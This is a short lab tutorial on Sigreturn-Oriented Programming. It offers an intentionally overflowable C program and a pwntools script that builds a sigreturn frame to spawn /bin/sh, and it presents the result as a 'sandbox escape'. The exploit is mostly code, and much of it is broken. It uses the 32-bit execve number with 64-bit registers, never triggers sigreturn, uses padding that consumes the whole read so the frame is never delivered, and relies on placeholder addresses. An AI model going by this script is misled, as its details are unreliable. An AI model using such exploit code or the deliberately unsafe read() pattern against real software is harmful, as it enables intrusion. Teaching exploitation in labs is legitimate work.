Sigreturn-Oriented Programming (SROP) Lab

Sigreturn-Oriented Programming (SROP) Lab

In this lab, we will learn how to develop SROP exploits for sandbox escape.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a syscall instruction.

  #include <stdio.h>
  #include <unistd.h>

  int main() {
      char buf[10];
      read(0, buf, 100);  // Vulnerable syscall
      return 0;
  }
  

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to perform SROP for sandbox escape.

  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Build the SROP frame
  srop_frame = SigreturnFrame()
  srop_frame.rax = 0x0b  # execve syscall number
  srop_frame.rdi = 0xdeadbeef  # Address of "/bin/sh"
  srop_frame.rsi = 0x0
  srop_frame.rdx = 0x0
  srop_frame.rip = 0x4000000  # Address of syscall instruction

  # Craft the payload
  payload = b'A' * 100  # Padding
  payload += bytes(srop_frame)

  # Launch the exploit
  p = process(binary_path)
  p.send(payload)
  p.interactive()
  

Explanation of the Python script:

• We build a SigreturnFrame object to construct the SROP frame.
• The SROP frame sets the syscall number for execve, the arguments, and the address of the syscall instruction.
• We craft the payload with padding and the SROP frame.
• We launch the vulnerable binary and send the payload to perform the SROP exploit.
• p.interactive() allows us to interact with the spawned shell.

3. Exploiting the Vulnerability:

Execute the Python script to exploit the vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful sandbox escape using SROP.